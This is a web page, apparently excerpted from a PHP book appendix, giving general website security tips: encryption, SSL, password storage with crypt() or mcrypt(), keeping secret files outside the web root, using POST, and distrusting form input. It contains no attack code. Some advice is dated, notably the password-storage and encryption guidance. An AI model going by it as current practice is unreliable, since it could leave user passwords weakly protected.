Home » » website-secure-PHP

website-secure-PHP

11:50
Cryptography is the process of changing the format of data (i.e., encrypting it) so that it is more difficult to read. Some cryptography, such as PGP, available for free for public use from http://www.pgp.com,  uses public and private keys in order to encode and decode information. Other cryptographic systems, like the crypt() function built into PHP will encrypt data but will not decrypt it. You can find out more about crypt() within the Strings section of the PHP manual.

Cryptography is just a part of a secure solution as it can only be used once data has been received by the server. You may also need to take advantage of SSL connections in your Web sites. SSL, which stands for Secure Sockets Layer, is a method of securely transmitting information between a client (the Web browser) and the server. Utilization of SSL connections (indicated by the https://prefix in a URL) is a must for e-commerce applications. You can also specify that cookies are sent over a SSL connection by setting the proper parameters when using the setcookie function. Check with your ISP or server administrator to see if SSL connections are supported on the machine you are using.

Passwords used within your PHP application should always be encrypted. If the server you are using does not support mcrypt(), use crypt() to encrypt the password entered during the login, then check this against the stored encrypted password.

While PHP does not have the same security concerns that you might find using CGI scripts or ASP, they still exist. There are a several considerations to keep in mind while programming.

The first recommendation I would make is that files which contain sensitive information such as passwords be placed outside of the Web document root. Every Web server application uses a folder as the default root for Web documents. Items within the folder can be accessed via a URL but items located above the default folder cannot be. However, they can still be used within PHP with the line:
require ("../secure.php");
The above line of code will include the file secure.php which is located one folder above the current document.

My second recommendation is a two-parter involving getting user submitted data from HTML forms. First you should always remember to use the POST form method (as opposed to GET) when transferring sensitive information. This is because the GET method will append the submitted data to the URL, making it visible in the Web browser window.
Second, you should be wary of user-submitted data because it can be a common loophole through which malicious users can wreak havoc with your system. Clever people may be able to insert JavaScript or executable code into your site using an HTML form. This code could send them sensitive information, alter databases, and so forth.

If you will be doing more than just basic Web development work, you ought to seriously consider learning more about Web security than the few points illustrated in this appendix.
There are literally dozens upon dozens of Web sites you can visit to keep yourself informed of pertinent security issues. The most prominent four, in my opinion, are:
There are also any number of books available ranging from those that generically discuss security to those that will assist in establish secure Windows NT or Linux Web servers.
With respect to PHP, do not forget to read the PHP manual's section on security. Also review the security section of the documentation for the database you are using on the server. Some, such as MySQL's manual, includes tips specifically with respect to using PHP and MySQL.






Categories: